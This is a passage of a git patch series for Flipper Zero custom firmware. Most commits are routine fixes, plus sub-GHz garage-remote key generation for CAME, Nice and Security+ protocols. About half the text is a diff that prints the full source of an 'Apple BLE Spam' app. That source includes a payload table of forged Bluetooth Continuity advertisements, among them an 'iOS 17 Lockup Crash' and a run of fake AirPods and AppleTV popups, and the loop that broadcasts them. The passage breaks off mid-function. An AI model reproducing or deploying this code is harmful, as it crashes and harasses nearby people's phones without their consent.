furi_string_get_cstr(loader_img_path), FA_OPEN_EXISTING | FA_READ) != - FR_OK)) { + FR_OK) || + (stat.fsize == 0)) { furi_string_free(loader_img_path); return false; } @@ -83,7 +84,7 @@ static bool flipper_update_load_stage(const FuriString* work_dir, UpdateManifest uint32_t crc = 0; do { uint16_t size_read = 0; - if(f_read(&file, img + bytes_read, MAX_READ, &size_read) != FR_OK) { + if(f_read(&file, img + bytes_read, MAX_READ, &size_read) != FR_OK) { //-V769 break; } crc = crc32_calc_buffer(crc, img + bytes_read, size_read); diff --git a/furi/core/check.c b/furi/core/check.c index f7dcfc595..8888eddfb 100644 --- a/furi/core/check.c +++ b/furi/core/check.c @@ -153,18 +153,18 @@ FURI_NORETURN void __furi_crash() { __furi_print_heap_info(); __furi_print_bt_stack_info(); -#ifndef FURI_DEBUG // Check if debug enabled by DAP // https://developer.arm.com/documentation/ddi0403/d/Debug-Architecture/ARMv7-M-Debug/Debug-register-support-in-the-SCS/Debug-Halting-Control-and-Status-Register--DHCSR?lang=en bool debug = CoreDebug->DHCSR & CoreDebug_DHCSR_C_DEBUGEN_Msk; +#ifdef FURI_NDEBUG if(debug) { #endif furi_hal_console_puts("\r\nSystem halted. Connect debugger for more info\r\n"); furi_hal_console_puts("\033[0m\r\n"); furi_hal_debug_enable(); - RESTORE_REGISTERS_AND_HALT_MCU(true); -#ifndef FURI_DEBUG + RESTORE_REGISTERS_AND_HALT_MCU(debug); +#ifdef FURI_NDEBUG } else { uint32_t ptr = (uint32_t)__furi_check_message; if(ptr < FLASH_BASE || ptr > (FLASH_BASE + FLASH_SIZE)) { diff --git a/furi/core/memmgr_heap.c b/furi/core/memmgr_heap.c index ca206cd39..b8baf9c7c 100644 --- a/furi/core/memmgr_heap.c +++ b/furi/core/memmgr_heap.c @@ -115,8 +115,9 @@ static size_t xBlockAllocatedBit = 0; #include /* Allocation tracking types */ -DICT_DEF2(MemmgrHeapAllocDict, uint32_t, uint32_t) -DICT_DEF2( +DICT_DEF2(MemmgrHeapAllocDict, uint32_t, uint32_t) //-V1048 + +DICT_DEF2( //-V1048 MemmgrHeapThreadDict, uint32_t, M_DEFAULT_OPLIST, diff --git a/lib/flipper_application/elf/elf_file.c b/lib/flipper_application/elf/elf_file.c index 7ac4c655d..9b8b4c8f5 100644 --- a/lib/flipper_application/elf/elf_file.c +++ b/lib/flipper_application/elf/elf_file.c @@ -853,7 +853,7 @@ ElfProcessSectionResult elf_process_section( if(process_section(elf->fd, section_header.sh_offset, section_header.sh_size, context)) { result = ElfProcessSectionResultSuccess; } else { - result = ElfProcessSectionResultCannotProcess; + result = ElfProcessSectionResultCannotProcess; //-V1048 } } diff --git a/lib/flipper_application/elf/elf_file_i.h b/lib/flipper_application/elf/elf_file_i.h index 39cadfdc6..e1b97b631 100644 --- a/lib/flipper_application/elf/elf_file_i.h +++ b/lib/flipper_application/elf/elf_file_i.h @@ -6,7 +6,7 @@ extern "C" { #endif -DICT_DEF2(AddressCache, int, M_DEFAULT_OPLIST, Elf32_Addr, M_DEFAULT_OPLIST) +DICT_DEF2(AddressCache, int, M_DEFAULT_OPLIST, Elf32_Addr, M_DEFAULT_OPLIST) //-V1048 /** * Callable elf entry type diff --git a/lib/lfrfid/lfrfid_worker.c b/lib/lfrfid/lfrfid_worker.c index 1e491c6b7..cbc7b02e3 100644 --- a/lib/lfrfid/lfrfid_worker.c +++ b/lib/lfrfid/lfrfid_worker.c @@ -118,7 +118,6 @@ void lfrfid_worker_start_thread(LFRFIDWorker* worker) { } void lfrfid_worker_stop_thread(LFRFIDWorker* worker) { - furi_assert(worker->mode_index == LFRFIDWorkerIdle); furi_thread_flags_set(furi_thread_get_id(worker->thread), LFRFIDEventStopThread); furi_thread_join(worker->thread); } diff --git a/lib/nfc/protocols/slix.c b/lib/nfc/protocols/slix.c index dbff2f218..4b15f4b97 100644 --- a/lib/nfc/protocols/slix.c +++ b/lib/nfc/protocols/slix.c @@ -197,7 +197,7 @@ ReturnCode slix_get_random(NfcVData* data) { } ReturnCode slix_unlock(NfcVData* data, uint32_t password_id) { - furi_assert(rand); + furi_assert(data); uint16_t received = 0; uint8_t rxBuf[32]; diff --git a/lib/u8g2/u8g2_glue.c b/lib/u8g2/u8g2_glue.c index 9463d1318..230bd2a1b 100644 --- a/lib/u8g2/u8g2_glue.c +++ b/lib/u8g2/u8g2_glue.c @@ -2,8 +2,8 @@ #include -#define CONTRAST_ERC 31 -#define CONTRAST_MGG 27 +#define CONTRAST_ERC 32 +#define CONTRAST_MGG 28 uint8_t u8g2_gpio_and_delay_stm32(u8x8_t* u8x8, uint8_t msg, uint8_t arg_int, void* arg_ptr) { UNUSED(u8x8); From 9d6352e92f3f17fd48cc89f8d07716eec292fe0c Mon Sep 17 00:00:00 2001 From: Derek Jamison Date: Thu, 12 Oct 2023 13:39:14 -0700 Subject: [PATCH 10/20] fix #3141: 12-bits is 0xFFF (or 0xFF0) CAME/NICE 12-bit (#3142) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * 12-bits is 0xFFF (or 0xFF0) * Mask with 0x7FFFF3FC for 850LM pairing Co-authored-by: あく --- applications/main/subghz/scenes/subghz_scene_set_type.c | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/applications/main/subghz/scenes/subghz_scene_set_type.c b/applications/main/subghz/scenes/subghz_scene_set_type.c index 8c040cc9c..f76bd9e27 100644 --- a/applications/main/subghz/scenes/subghz_scene_set_type.c +++ b/applications/main/subghz/scenes/subghz_scene_set_type.c @@ -134,7 +134,7 @@ bool subghz_scene_set_type_on_event(void* context, SceneManagerEvent event) { subghz->txrx, "AM650", 315000000, SUBGHZ_PROTOCOL_PRINCETON_NAME, key, 24, 400); break; case SubmenuIndexNiceFlo12bit: - key = (key & 0x0000FFF0) | 0x1; //btn 0x1, 0x2, 0x4 + key = (key & 0x00000FF0) | 0x1; //btn 0x1, 0x2, 0x4 generated_protocol = subghz_txrx_gen_data_protocol( subghz->txrx, "AM650", 433920000, SUBGHZ_PROTOCOL_NICE_FLO_NAME, key, 12); break; @@ -144,7 +144,7 @@ bool subghz_scene_set_type_on_event(void* context, SceneManagerEvent event) { subghz->txrx, "AM650", 433920000, SUBGHZ_PROTOCOL_NICE_FLO_NAME, key, 24); break; case SubmenuIndexCAME12bit: - key = (key & 0x0000FFF0) | 0x1; //btn 0x1, 0x2, 0x4 + key = (key & 0x00000FF0) | 0x1; //btn 0x1, 0x2, 0x4 generated_protocol = subghz_txrx_gen_data_protocol( subghz->txrx, "AM650", 433920000, SUBGHZ_PROTOCOL_CAME_NAME, key, 12); break; @@ -198,14 +198,17 @@ bool subghz_scene_set_type_on_event(void* context, SceneManagerEvent event) { subghz_txrx_gen_secplus_v1_protocol(subghz->txrx, "AM650", 390000000); break; case SubmenuIndexSecPlus_v2_310_00: + key = (key & 0x7FFFF3FC); // 850LM pairing generated_protocol = subghz_txrx_gen_secplus_v2_protocol( subghz->txrx, "AM650", 310000000, key, 0x68, 0xE500000); break; case SubmenuIndexSecPlus_v2_315_00: + key = (key & 0x7FFFF3FC); // 850LM pairing generated_protocol = subghz_txrx_gen_secplus_v2_protocol( subghz->txrx, "AM650", 315000000, key, 0x68, 0xE500000); break; case SubmenuIndexSecPlus_v2_390_00: + key = (key & 0x7FFFF3FC); // 850LM pairing generated_protocol = subghz_txrx_gen_secplus_v2_protocol( subghz->txrx, "AM650", 390000000, key, 0x68, 0xE500000); break; From e664159188567e670b0b8527f405ae89ab18406f Mon Sep 17 00:00:00 2001 From: Astra <93453568+Astrrra@users.noreply.github.com> Date: Fri, 13 Oct 2023 05:48:16 +0900 Subject: [PATCH 11/20] [FL-3621] Fix double arrows and add proper indication (#3146) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: hedger Co-authored-by: あく --- .../services/gui/modules/byte_input.c | 90 +++++++++++------- .../Common/More_data_placeholder_5x7.png | Bin 0 -> 92 bytes 2 files changed, 54 insertions(+), 36 deletions(-) create mode 100644 assets/icons/Common/More_data_placeholder_5x7.png diff --git a/applications/services/gui/modules/byte_input.c b/applications/services/gui/modules/byte_input.c index e0cbbb779..4846bbd8c 100644 --- a/applications/services/gui/modules/byte_input.c +++ b/applications/services/gui/modules/byte_input.c @@ -226,16 +226,33 @@ static void byte_input_draw_input(Canvas* canvas, ByteInputModel* model) { canvas_invert_color(canvas); } } else { - canvas_draw_glyph( - canvas, - text_x + 2 + byte_position * 14, - text_y, - byte_input_get_nibble_text(model->bytes[i], true)); - canvas_draw_glyph( - canvas, - text_x + 8 + byte_position * 14, - text_y, - byte_input_get_nibble_text(model->bytes[i], false)); + if(model->first_visible_byte > 0 && i == model->first_visible_byte) { + canvas_draw_icon( + canvas, + text_x + 2 + byte_position * 14, + text_y - 7, + &I_More_data_placeholder_5x7); + } else { + canvas_draw_glyph( + canvas, + text_x + 2 + byte_position * 14, + text_y, + byte_input_get_nibble_text(model->bytes[i], true)); + } + if(model->bytes_count - model->first_visible_byte > max_drawable_bytes && + i == model->first_visible_byte + MIN(model->bytes_count, max_drawable_bytes) - 1) { + canvas_draw_icon( + canvas, + text_x + 8 + byte_position * 14, + text_y - 7, + &I_More_data_placeholder_5x7); + } else { + canvas_draw_glyph( + canvas, + text_x + 8 + byte_position * 14, + text_y, + byte_input_get_nibble_text(model->bytes[i], false)); + } } if(draw_index_line) { @@ -260,14 +277,6 @@ static void byte_input_draw_input(Canvas* canvas, ByteInputModel* model) { snprintf(str, 20, "%u", (model->selected_byte + 1)); canvas_draw_str(canvas, text_x + 75, text_y2, str); } - - if(model->bytes_count - model->first_visible_byte > max_drawable_bytes) { - canvas_draw_icon(canvas, 123, 21, &I_ButtonRightSmall_3x5); - } - - if(model->first_visible_byte > 0) { - canvas_draw_icon(canvas, 1, 21, &I_ButtonLeftSmall_3x5); - } } /** Draw input box (selected view) @@ -306,27 +315,36 @@ static void byte_input_draw_input_selected(Canvas* canvas, ByteInputModel* model byte_input_get_nibble_text(model->bytes[i], false)); canvas_invert_color(canvas); } else { - canvas_draw_glyph( - canvas, - text_x + 2 + byte_position * 14, - text_y, - byte_input_get_nibble_text(model->bytes[i], true)); - canvas_draw_glyph( - canvas, - text_x + 8 + byte_position * 14, - text_y, - byte_input_get_nibble_text(model->bytes[i], false)); + if(model->first_visible_byte > 0 && i == model->first_visible_byte) { + canvas_draw_icon( + canvas, + text_x + 2 + byte_position * 14, + text_y - 7, + &I_More_data_placeholder_5x7); + } else { + canvas_draw_glyph( + canvas, + text_x + 2 + byte_position * 14, + text_y, + byte_input_get_nibble_text(model->bytes[i], true)); + } + if(model->bytes_count - model->first_visible_byte > max_drawable_bytes && + i == model->first_visible_byte + MIN(model->bytes_count, max_drawable_bytes) - 1) { + canvas_draw_icon( + canvas, + text_x + 8 + byte_position * 14, + text_y - 7, + &I_More_data_placeholder_5x7); + } else { + canvas_draw_glyph( + canvas, + text_x + 8 + byte_position * 14, + text_y, + byte_input_get_nibble_text(model->bytes[i], false)); + } } } - if(model->bytes_count - model->first_visible_byte > max_drawable_bytes) { - canvas_draw_icon(canvas, 123, 21, &I_ButtonRightSmall_3x5); - } - - if(model->first_visible_byte > 0) { - canvas_draw_icon(canvas, 1, 21, &I_ButtonLeftSmall_3x5); - } - canvas_invert_color(canvas); } diff --git a/assets/icons/Common/More_data_placeholder_5x7.png b/assets/icons/Common/More_data_placeholder_5x7.png new file mode 100644 index 0000000000000000000000000000000000000000..85025d9f0acc7275b44e8fdc45ea8e2c9293e68e GIT binary patch literal 92 zcmeAS@N?(olHy`uVBq!ia0vp^tU%1p!3-q7SC-!aQfvV}A+G=b{|7Qd4_&SUQi7f? njv*Ddk`fe{44M=i8W Date: Fri, 13 Oct 2023 07:11:09 +0100 Subject: [PATCH 12/20] Crash message for malloc(0) --nobuild --- furi/core/memmgr_heap.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/furi/core/memmgr_heap.c b/furi/core/memmgr_heap.c index 3b4fdafa0..c6082f798 100644 --- a/furi/core/memmgr_heap.c +++ b/furi/core/memmgr_heap.c @@ -481,7 +481,7 @@ void* pvPortMalloc(size_t xWantedSize) { configASSERT((((size_t)pvReturn) & (size_t)portBYTE_ALIGNMENT_MASK) == 0); - furi_check(pvReturn, "out of memory"); + furi_check(pvReturn, xWantedSize ? "out of memory" : "malloc(0)"); pvReturn = memset(pvReturn, 0, to_wipe); return pvReturn; } From 04dc10dc7fc1d822a34c36409ea6ee6a163eaeec Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Sat, 14 Oct 2023 21:16:36 +0100 Subject: [PATCH 13/20] Fix slow redundant reads for SubGhz files --- applications/main/subghz/subghz_i.c | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/applications/main/subghz/subghz_i.c b/applications/main/subghz/subghz_i.c index 7baae5ab1..4d87a33ce 100644 --- a/applications/main/subghz/subghz_i.c +++ b/applications/main/subghz/subghz_i.c @@ -139,16 +139,14 @@ bool subghz_key_load(SubGhz* subghz, const char* file_path, bool show_dialog) { } } - //Load latitute and longitude if present - if(!flipper_format_read_float(fff_data_file, "Latitute", (float*)&temp_lat, 1)) { - FURI_LOG_E(TAG, "Missing Latitude (optional)"); + //Load latitute and longitude if present, strict mode to avoid reading the whole file twice + flipper_format_set_strict_mode(fff_data_file, true); + if(!flipper_format_read_float(fff_data_file, "Latitute", (float*)&temp_lat, 1) || + !flipper_format_read_float(fff_data_file, "Longitude", (float*)&temp_lon, 1)) { + FURI_LOG_W(TAG, "Missing Latitude and Longitude (optional)"); + flipper_format_rewind(fff_data_file); } - flipper_format_rewind(fff_data_file); - - if(!flipper_format_read_float(fff_data_file, "Longitude", (float*)&temp_lon, 1)) { - FURI_LOG_E(TAG, "Missing Longitude (optional)"); - } - flipper_format_rewind(fff_data_file); + flipper_format_set_strict_mode(fff_data_file, false); size_t preset_index = subghz_setting_get_inx_preset_by_name(setting, furi_string_get_cstr(temp_str)); From 2b34d96d8cf2a10ceb30dce3e1986c971fdf4e9f Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Sun, 15 Oct 2023 06:42:08 +0100 Subject: [PATCH 14/20] Fix api --nobuild --- firmware/targets/f7/api_symbols.csv | 1 + 1 file changed, 1 insertion(+) diff --git a/firmware/targets/f7/api_symbols.csv b/firmware/targets/f7/api_symbols.csv index f0099c6f2..2b8625f62 100644 --- a/firmware/targets/f7/api_symbols.csv +++ b/firmware/targets/f7/api_symbols.csv @@ -3451,6 +3451,7 @@ Variable,+,I_Lock_7x8,Icon, Variable,+,I_Lockscreen,Icon, Variable,+,I_MHz_25x11,Icon, Variable,+,I_Modern_reader_18x34,Icon, +Variable,+,I_More_data_placeholder_5x7,Icon, Variable,+,I_Move_flipper_26x39,Icon, Variable,+,I_Muted_8x8,Icon, Variable,+,I_NFC_dolphin_emulation_47x61,Icon, From 0465f3ca311c2d3a209c806740f5721006d38c42 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Sun, 15 Oct 2023 18:34:23 +0100 Subject: [PATCH 15/20] Apple BLE Spam -> BLE Spam (now modular!) --- .../external/apple_ble_spam/apple_ble_spam.c | 837 ------------------ .../external/apple_ble_spam/application.fam | 20 - .../apple_ble_spam/icons/apple_10px.png | Bin 563 -> 0 bytes .../lib/continuity/continuity.c | 165 ---- .../lib/continuity/continuity.h | 59 -- .../{apple_ble_spam => ble_spam}/LICENSE | 0 .../external/ble_spam/application.fam | 15 + applications/external/ble_spam/ble_spam.c | 363 ++++++++ .../external/ble_spam/ble_spam_10px.png | Bin 0 -> 4238 bytes .../external/ble_spam/icons/apple.png | Bin 0 -> 4258 bytes applications/external/ble_spam/icons/ble.png | Bin 0 -> 5165 bytes .../external/ble_spam/protocols/_base.h | 17 + .../external/ble_spam/protocols/_registry.c | 7 + .../external/ble_spam/protocols/_registry.h | 11 + .../external/ble_spam/protocols/continuity.c | 276 ++++++ .../external/ble_spam/protocols/continuity.h | 36 + 16 files changed, 725 insertions(+), 1081 deletions(-) delete mode 100644 applications/external/apple_ble_spam/apple_ble_spam.c delete mode 100644 applications/external/apple_ble_spam/application.fam delete mode 100644 applications/external/apple_ble_spam/icons/apple_10px.png delete mode 100644 applications/external/apple_ble_spam/lib/continuity/continuity.c delete mode 100644 applications/external/apple_ble_spam/lib/continuity/continuity.h rename applications/external/{apple_ble_spam => ble_spam}/LICENSE (100%) create mode 100644 applications/external/ble_spam/application.fam create mode 100644 applications/external/ble_spam/ble_spam.c create mode 100644 applications/external/ble_spam/ble_spam_10px.png create mode 100644 applications/external/ble_spam/icons/apple.png create mode 100644 applications/external/ble_spam/icons/ble.png create mode 100644 applications/external/ble_spam/protocols/_base.h create mode 100644 applications/external/ble_spam/protocols/_registry.c create mode 100644 applications/external/ble_spam/protocols/_registry.h create mode 100644 applications/external/ble_spam/protocols/continuity.c create mode 100644 applications/external/ble_spam/protocols/continuity.h diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c deleted file mode 100644 index de6ee8b22..000000000 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ /dev/null @@ -1,837 +0,0 @@ -#include -#include -#include -#include -#include -#include "apple_ble_spam_icons.h" - -#include "lib/continuity/continuity.h" - -typedef struct { - const char* title; - const char* text; - bool random; - ContinuityMsg msg; -} Payload; - -// Hacked together by @Willy-JL -// Custom adv logic by @Willy-JL (idea by @xMasterX) -// iOS 17 Crash by @ECTO-1A -// Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A -// Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ -// Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ -// Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam - -static Payload - payloads[] = - { -#if false - {.title = "AirDrop", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeAirDrop, - .data = {.airdrop = {}}, - }}, - {.title = "Airplay Target", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeAirplayTarget, - .data = {.airplay_target = {}}, - }}, - {.title = "Handoff", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeHandoff, - .data = {.handoff = {}}, - }}, - {.title = "Tethering Source", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeTetheringSource, - .data = {.tethering_source = {}}, - }}, - {.title = "Mobile Backup", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x04}}, - }}, - {.title = "Watch Setup", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x05}}, - }}, - {.title = "Internet Relay", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x07}}, - }}, - {.title = "WiFi Password", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x08}}, - }}, - {.title = "Repair", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x0A}}, - }}, - {.title = "Apple Pay", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x0C}}, - }}, - {.title = "Developer Tools Pairing Request", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x0E}}, - }}, - {.title = "Answered Call", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x0F}}, - }}, - {.title = "Ended Call", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x10}}, - }}, - {.title = "DD Ping", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x11}}, - }}, - {.title = "DD Pong", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x12}}, - }}, - {.title = "Companion Link Proximity", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x14}}, - }}, - {.title = "Remote Management", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x15}}, - }}, - {.title = "Remote Auto Fill Pong", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x16}}, - }}, - {.title = "Remote Display", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x17}}, - }}, - {.title = "Nearby Info", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyInfo, - .data = {.nearby_info = {}}, - }}, -#endif - {.title = "Lockup Crash", - .text = "iOS 17, locked, long range", - .random = false, - .msg = - { - .type = ContinuityTypeCustomCrash, - .data = {.custom_crash = {}}, - }}, - {.title = "Random Action", - .text = "Spam shuffle Nearby Actions", - .random = true, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x00}}, - }}, - {.title = "Random Pair", - .text = "Spam shuffle Proximity Pairs", - .random = true, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x00, .model = 0x0000}}, - }}, - {.title = "AppleTV AutoFill", - .text = "Banner, unlocked, long range", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x13}}, - }}, - {.title = "AppleTV Connecting...", - .text = "Modal, unlocked, long range", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x27}}, - }}, - {.title = "Join This AppleTV?", - .text = "Modal, unlocked, spammy", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xBF, .type = 0x20}}, - }}, - {.title = "AppleTV Audio Sync", - .text = "Banner, locked, long range", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x19}}, - }}, - {.title = "AppleTV Color Balance", - .text = "Banner, locked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x1E}}, - }}, - {.title = "Setup New iPhone", - .text = "Modal, locked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x09}}, - }}, - {.title = "Setup New Random", - .text = "Modal, locked, glitched", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0x40, .type = 0x09}}, - }}, - {.title = "Transfer Phone Number", - .text = "Modal, locked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x02}}, - }}, - {.title = "HomePod Setup", - .text = "Modal, unlocked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x0B}}, - }}, - {.title = "AirPods Pro", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0E20}}, - }}, - {.title = "Beats Solo 3", - .text = "Modal, spammy (stays open)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0620}}, - }}, - {.title = "AirPods Max", - .text = "Modal, laggy (stays open)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0A20}}, - }}, - {.title = "Beats Flex", - .text = "Modal, laggy (stays open)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1020}}, - }}, - {.title = "Airtag", - .text = "Modal, unlocked", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x05, .model = 0x0055}}, - }}, - {.title = "Hermes Airtag", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x05, .model = 0x0030}}, - }}, - {.title = "Setup New AppleTV", - .text = "Modal, unlocked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x01}}, - }}, - {.title = "Pair AppleTV", - .text = "Modal, unlocked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x06}}, - }}, - {.title = "HomeKit AppleTV Setup", - .text = "Modal, unlocked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x0D}}, - }}, - {.title = "AppleID for AppleTV?", - .text = "Modal, unlocked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x2B}}, - }}, - {.title = "AirPods", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0220}}, - }}, - {.title = "AirPods 2nd Gen", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0F20}}, - }}, - {.title = "AirPods 3rd Gen", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1320}}, - }}, - {.title = "AirPods Pro 2nd Gen", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1420}}, - }}, - {.title = "Powerbeats 3", - .text = "Modal, spammy (stays open)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0320}}, - }}, - {.title = "Powerbeats Pro", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0B20}}, - }}, - {.title = "Beats Solo Pro", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0C20}}, - }}, - {.title = "Beats Studio Buds", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1120}}, - }}, - {.title = "Beats X", - .text = "Modal, spammy (stays open)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0520}}, - }}, - {.title = "Beats Studio 3", - .text = "Modal, spammy (stays open)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0920}}, - }}, - {.title = "Beats Studio Pro", - .text = "Modal, spammy (stays open)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1720}}, - }}, - {.title = "Beats Fit Pro", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1220}}, - }}, - {.title = "Beats Studio Buds+", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1620}}, - }}, -}; - -#define PAYLOAD_COUNT ((signed)COUNT_OF(payloads)) - -struct { - uint8_t count; - ContinuityData** datas; -} randoms[ContinuityTypeCount] = {0}; - -uint16_t delays[] = { - 20, - 50, - 100, - 150, - 200, - 300, - 400, - 500, - 750, - 1000, - 1500, - 2000, - 2500, - 3000, - 4000, - 5000, -}; - -typedef struct { - bool resume; - bool advertising; - uint8_t delay; - uint8_t size; - uint8_t* packet; - Payload* payload; - FuriThread* thread; - uint8_t mac[GAP_MAC_ADDR_SIZE]; - int8_t index; -} State; - -static int32_t adv_thread(void* ctx) { - State* state = ctx; - Payload* payload = state->payload; - ContinuityMsg* msg = &payload->msg; - ContinuityType type = msg->type; - - while(state->advertising) { - if(payload->random) { - uint8_t random_i = rand() % randoms[type].count; - memcpy(&msg->data, randoms[type].datas[random_i], sizeof(msg->data)); - } - continuity_generate_packet(msg, state->packet); - furi_hal_bt_custom_adv_set(state->packet, state->size); - furi_thread_flags_wait(true, FuriFlagWaitAny, delays[state->delay]); - } - - return 0; -} - -static void stop_adv(State* state) { - state->advertising = false; - furi_thread_flags_set(furi_thread_get_id(state->thread), true); - furi_thread_join(state->thread); - furi_hal_bt_custom_adv_stop(); -} - -static void start_adv(State* state) { - state->advertising = true; - furi_thread_start(state->thread); - uint16_t delay = delays[state->delay]; - furi_hal_bt_custom_adv_start(delay, delay, 